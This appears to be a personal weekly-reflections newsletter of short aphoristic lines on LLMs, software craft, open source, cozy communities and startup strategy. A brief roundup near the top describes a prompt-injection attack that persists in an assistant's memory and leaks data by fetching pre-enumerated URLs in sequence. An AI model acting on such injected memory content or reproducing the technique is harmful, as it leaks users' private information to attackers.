I just published my weekly reflections: https://docs.google.com/document/d/1x8z6k07JqXTVIRVNr1S_7wYVl5L7IpX14gXxU1UBrGk/edit?tab=t.0#heading=h.st0cqxx5kcrBespoke creation vs outcomes. LLMs as gap-fillers. Faster horses. Elevated Engineering. Jargon as incantation. The digital Third Place. Cozy Community wizards. Flintstoning. Instagrammable burgers. Motivated randos.----
I went on the Atlantic podcast with my friends and collaborators Mike Masnick and Zoe Weinberg to talk about Resonant Computing: an optimistic vision for tech in the age of AI.
Bespoke creation vs bespoke outcomes are distinct.
We used to have bespoke software creation and industrial software outcomes.
With LLMs and infinite software, we’ll have industrial software creation and bespoke software outcomes.
This week in the Wild West roundup.
The prompt injection stays active long term in memories.
It’s an evolution of the ShadowLeak attack.
It uses preenumerated URLs to leak information by fetching them in sequence.
Ben Thompson observed this week that "Humans want humans."
Deepfates: “More people need to understand that Claude Code is a general intelligence that can do stuff on your computer.”
LLMs are clearly useful… and also the things people use them for are the dumbest things.
I love LLMs and I hate chatbots.
I think chatbots are an embarrassing party trick.
Corporations pretending to be our friends.
Depressingly, this is all people think LLMs are good for today.
LLMs have vast untapped potential to create resonance for society.
As an industry this part is just getting started.
This is the part that will grow far beyond chatbots.
Anyone can hit the photocopy button to have LLMs make slop.
The most valuable thing is having the taste of which subset is actually useful.
LLMs are gap-fillers and will fill all gaps implicitly with the most average input.
So it's your job to give them non-average gaps to fill, to inject the entropy.
If you ask it for a joke you will get one of ten hyper bland ones.
If you ask it for a joke about the pope, an orange, and Richard Feynman, you'll get something novel.
You'll get the most average answer to that very novel request, which will in turn be novel.
All vibecoded software today is a toy.
The first thing that can integrate with your life in a way you depend on will change the world.
An excellent piece on the Cosmos blog about Faster Horses.
The “replace workers with automated versions” default frame for AI is like pushing for faster horses.
Claude Code's infinite patience means that if it gets pointed in the wrong direction it will just plow through multiple walls and do some damage.
That means that pointing it in the right direction is significantly more important than with a human.
A new important word in the era of LLMs: elevated.
What makes you as a human special when I can replace you with a script?
Elevated and amplification are two related words around use of LLMs.
LLMs amplify whatever you apply them to.
You can apply them to something good or bad.
For example, curiosity vs laziness.
But elevated implies the resonant, positive part of amplification.
Elevated Engineering.
Elevated Engineering has three different tiers.
0-1: Enabling people to do what they couldn’t do before.
1-10: Helping people with relevant experience amplify it beyond what they could do before.
10-100: People who have not just relevant experience, but also the ability to change how they can work
They can redo how they work with these new tools.
They can change their meta.
Jargon that is understood by your collaborator is like a magic incantation.
It has to be understood by your collaborator to actually give you leverage.
LLMs are great at unpacking any jargon.
Jargon is compression.
Its usefulness in a context is precisely proportional to how inscrutable it makes it to outsiders.
The right jargon is extremely effective for LLMs.
A flick of the wrist.
But you have to have the relevant experience to know the right jargon.
Industrialization loses the craft.
The craft is fun to execute.
To be in your flow state
Wu wei.
When you industrialize you go from craft work to turning a crank.
The result might be more predictable or scalable, but the joy of creation evaporates.
A feeling of ennui develops.
Simon Willison calls this, in the context of SWEs and LLMs, “deep blue.”
When things get industrialized the former default way becomes a specialty.
Before, it was just “baking.”
After industrialization, it’s now “baking from scratch.”
Before cell phones it was just a “phone.”
After cell phones, it was a “land line.”
The world moved on, and what used to be the default or even only way became a rare way.
We’ll need the same kind of shift for software engineering.
There’s the now quaint, non-default way, and the industrialized way.
Craft engineering?
Classic engineering?
It used to be the writer, the athlete, the actor, that we elevated.
But now with LLMs it will be the editor, the coach, the director who matter most.
There’s a difference between vibecoding and Elevated Engineering.
Both use LLMs in new ways.
Vibecoding is a “make it work” mindset.
A good enough, satisficing mindset.
Elevated Engineering uses LLMs to extend your expertise.
For example,say “Do property-based testing”.
Use precise jargon that gives the LLM clear direction.
Putting up the tentpoles and letting the LLM drape the canvas.
You used to have to sell developers on Test Driven Development.
It was like eating your vegetables.
Healthy but kind of a drag.
But you don't have to sell an LLM.
They’ll just do it if you use the right magic word.
If you told a beleaguered human to eat their vegetables they might punch you!
How will LLMs affect open source quality?
It definitely undermines the business models of e.g. Tailwind.
Those models are unlikely to ever work again.
But now engineers don't need to use libraries.
"Obviously I'm not going to write my own cron syntax parser" in a world of LLMs transforms to "Obviously I won’t even consider using libraries to do that."
Open sourcing a library is a lot of effort.
It used to be that the amount of effort to write the code was large, and the amount to maintain it was large.
But now LLMs mess with that calculus.
If you can knock out 10 libraries in a day of work, you won't open source them because you have to.
The effort to maintain them dwarfs the time to create them.
The complexity threshold that makes it worth open sourcing has risen significantly.
For example, would you use kubernetes or build your own subset?
You need the experience to guide the creation of this code well but it's super powerful.
The people who have relevant experience can get the LLMs to write bespoke “libraries” with the flick of the wrist.
Other people will not benefit from that expertise.
LLMs are the best tech in the world to cheat at homework... and simultaneously, the best tech in the world to learn new things.
Is your default tendency laziness or curiosity?
That will decide your fate in the era of LLMs.
A paper: On the slow death of scaling in AI.
When you get to the top of an s-curve, it takes time to realize.
Each step gets a smaller benefit for the same input.
At the beginning it just feels like you’ve lost your touch.
Last week I asked where the digital third place was.
Someone proposed it was Discord.
But that feels like a hollow answer to me.
The physical third places are coffee shops.
Over the last few decades, more and more coffee shops are Starbucks.
This feels the same, but is way more precarious.
A single MBA at Starbucks Corporate could make a decision that could in a snap remove the third places across the country.
“If we put a 10 minute time limit on staying at the store, we could increase same store sales by 5%!”
To be resonant and load bearing, the third place must be open and federated, impossible for any one decider to destroy in an instant.
Imagine an inherently dangerous domain.
Like, say, working with fissile materials, or money transmission, or software security models.
There is significant downside if you get it wrong.
That means you need to be trained, and it might even need to be regulated.
But imagine someone creates a precision controlled robot arm.
The arm is programmed so it can’t do dangerous things.
Now, from a safe distance, you can operate the arm and work with dangerous but powerful materials, safely.
That precision robot arm is a hugely valuable asset that unlocks potential that was otherwise not possible.
The app model puts a significant damper on leverage from a motivated user.
The app model requires the receiver to trust the creator of the code.
That was reasonable when code was expensive and the creator was likely a business with something to lose.
But LLMs make it much more common for code to be written by some rando.
How far is the leverage of one motivated rando?
In the app model, it’s maybe 2-5x.
That is, they can grow their influence to between 2-5 people who know them well enough to trust them.
But what if you could get a multiplier of 100x or even 1000x?
That would be a radically different ecosystem.
All vibe-coding tools today create software distributed in the normal add model, which gives a ceiling of 2-5x leverage.
I don’t think that it’s that people are afraid of AI in itself, but rather it's that they're afraid of Big Tech to steamroll them and not do what's best for them.
Three tiers of security in a system.
1) Trivial to attack.
This is where Claude Code is today.
Don’t download anyone else’s code who might try to harm you!
Someone could harm you even accidentally.
2) Requires malicious intent to attack.
Sandboxing, DOM sanitization, etc.
Possible to attack, but hard to break accidentally.
You still need to trust the code to not be actively malicious.
One way is to have some kind of review from a trusted party to vouch for the code.
3) Difficult for even malicious users to attack.
The gold standard.
It takes time to get there.
But a huge unlock when you do!
Imagine watching an arch be built before you realize arches are possible.
You see all of the scaffolding as it’s built.
It looks like any other building.
Then, once it’s done, the scaffolding is removed… and it stands on its own!
A magic trick.
An app store is a load-bearing part of the app model.
It could also be temporary scaffolding to get a new negative-friction distribution model going.
LLMs haven’t seen significant traction in enterprise yet.
That’s where users are more sophisticated and willing to pay.
Getting to low-sophistication, low-willingness-to-pay consumers will be very hard for the foreseeable future.
Instead of building the best shopping list ever with perfect polish, build a really basic one that is actually integrated into your life.
If you assume an island, the former is all you can do.
The same origin model assumes the former.
The latter requires a horizontal model.
The security model we use today is verticalized, data in a silo.
If you want horizontal usage of your data, then we need a new security model.
Fabric is a good word for a substrate for cozy communities.
Fabric is inherently cozy.
Three pillars that support one another and create a flywheel.
1) Make vibecoding in the system easy enough.
2) Make the results robust enough.
3) Make the produced software resonant and engaging for cozy communities.
Focus on making useful software, then make it easy.
Lots of vibecoding tools are focusing on making shitty software quickly.
That’s a cul de sac.
Infinite software is not vibe coding.
Vibecoding is one ingredient into infinite software.
It’s now commodity.
It’s not even the most important ingredient, because now you can take it for granted.
Imagine a new open ecosystem catalysed by a specific company.
People should bet not that the company will make it, but that the ecosystem will.
Related, but distinct.
The company is a means to an end.
The end is getting the open ecosystem to a critical mass.
Instead of optimizing for engagement, optimize for resonance.
Resonance is also engaging, it’s just only the positive valence form.
Engagement can also be the hollow form.
If you don’t specify which one, you’ll go for the easier one: the hollow one.
Resonance is also a sign of PMF.
The cozy community is the atomic unit.
We often assume that individuals are the atomic unit.
But we are constantly working with other people in small networks.
A married couple is a cozy community.
A kid’s soccer team is a cozy community.
If your planning interacts with others, that’s a cozy community.
If you have a family, your family matters more than you do individually.
For something to be a system of record, everyone who relies on it needs to use the same system.
If it’s too complex, then no one will keep it up to date.
The map won’t reflect the territory.
If it’s too simple, then it won’t be useful.
The map won’t have enough detail to navigate.
There can only be one system of record, and all collaborators have to coordinate on one.
That is an inherent balancing act.
Imagine if each cozy community had a super organizer wizard.
Capable of creating resonant magic with the flick of a wrist.
They bring a magic no one else in the community needs to understand, but everyone can benefit from.
They can go hang out with other wizards from other cozy communities to share magic spells with one another.
The super-organizer isn’t just motivated, they also can wield magic.
Cozy communities need a process for cross-pollination and percolation.
For good ideas from one cozy community to bubble over and help other communities.
The fractal nature allows different pockets, different niches.
When everything is merged into one landscape, only the fittest survive, you get infinite niches and infinite scale and nothing in between.
Good words are charming.
A tweet: “just mass cancelled $27k/year in subscriptions
made a claude code skill that:
1. reads credit card statements/extracts subscriptions
2. automatically asks follow-up q's to clarify which ones you want to cancel
3. actually opens chrome and literally cancels them for you”
So much of software in the last 20 years has been predicated on software being expensive to write.
Software is expensive to write, but as the creator you get the data, which makes a moat.
But what if that first part doesn’t apply anymore?
The YC playbook by default only gives customers faster horses.
It aims for such a razor thin PMF to then grow via gradient descent.
Things that require the customer to change how they think require too much difference to be captured in that tiny step.
The YC playbook is so hyper optimized for the same origin paradigm that everybody forgot that it could ever not work.
Imagine people who have lived in a given paradigm for their entire career.
E.g. The YC playbook paradigm, which is downstream of the same origin paradigm.
Imagine someone comes along and says they’re going to disrupt that paradigm.
It’s existentially terrifying.
Not only are you wrong but you’re in the wrong universe.
Those people would look like kooks, and be easy to dismiss, before everything was disrupted.
A 0-to-1 pattern: Flintstoning.
Imagine pushing the car with your feet.
People not looking closely will think the car is moving under its own power.
But actually it’s being driven by something very manual and non-scalable.
Fake it ‘til you make it.
Metrics are only necessary past a certain scale.
Below that scale, you don’t need metrics, and metrics are distracting and possibly misleading.
Past the critical scale though, you can’t steer by touch anymore, so you need metrics to steer by sight.
Metrics are way worse than steering by touch, but they’re the only approach that works past a certain scale.
Sudafed and the flu have a co-dependant relationship.
Sudafed solves flu-like symptoms, so you can go into the office…
…and infect your coworkers, who also now need Sudafed.
A number of tech companies act like smart people are abundant and thus replaceable.
That is their employment strategy.
Make their hiring bar high enough that working (and succeeding) in the environment is a credential.
Then just burn through people as quickly as possible, extracting as much as you can.
Make examples of the employee if there’s even a single transgression.
Make sure they’re always in fear.
A very Saruman-style employment philosophy.
I… don’t love this approach.
Someone noted this week that premium burgers have gotten increasingly difficult to eat.
They’re towering: they look great, but they’re impossible to eat.
She observed: the burger’s main imperative is not to be eaten but to be sold.
Those are distinct!
In the modern era, that difference leads to instagrammable burgers that are impossible to eat.
"I know there’s a there there, but this is not the vehicle to take us there."
It’s one thing to be able to distill complex topics to the level of The New Yorker.
It’s another thing to distill complex topics to the level of Reader’s Digest.
Past a certain level it requires an almost intellectually offensive distillation–but if you don’t, you can’t connect with readers who aren’t experts and aren’t that interested.
If you want someone to be loyal and authentically evangelize, go out of your way to make it clear they are not a chump.
Give them something of value they didn't even have to ask for.
People will rise or fall to your expectations.
So why not put the expectations where you want them to go?
Research and development are two different things.
Research is default divergent.
Development is default convergent.
You need both, but separately and in harmony.
Pull is default convergent.
Push is default divergent.
Deliver the mission, as quickly as possible.
But don't lose sight of the mission and climb the wrong hill.
Your capability and maturity have to be at a harmonious level to maximize learning.
If your capability is beyond your maturity, you'll get bored at the important lessons.
You won’t receive the important lessons necessary to mature.
There are some political personalities that don’t believe in any ideal.
You can't believe in any ideal and also believe in that politician.
Steering and learning are distinct.
A slime mold can learn but not steer.
Steering comes from a brain.
Steering requires a centralized component with leverage.
As an idealist sometimes we succumb to magical thinking.
"This matters so much that even if it would be a miracle to accomplish it we should still tilt at the windmills."
Personally, even if I care about the outcome a ton, I can’t care about it unless I see a plausible theory of change.
That theory of change has to lead to compounding, discontinuous changes.
It needs to be plausible, but not necessarily guaranteed.
Just that if it did happen, it wouldn’t have been a miracle.
Otherwise, I’m pouring effort into a sink that won’t improve the world.
What is your highest and best use of your effort to improve the world?
It needs to be on things that matter, and that you can move the needle on.
You need both.
Two little nuggets from the show Andor
“An open invitation is no invitation at all.”
“The axe forgets, but the tree remembers.”
A classic quote from George Bernard Shaw:
“The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself.
Therefore all progress depends on the unreasonable man.”
There are two different kinds of unreasonable people: Sarumans and Radagasts.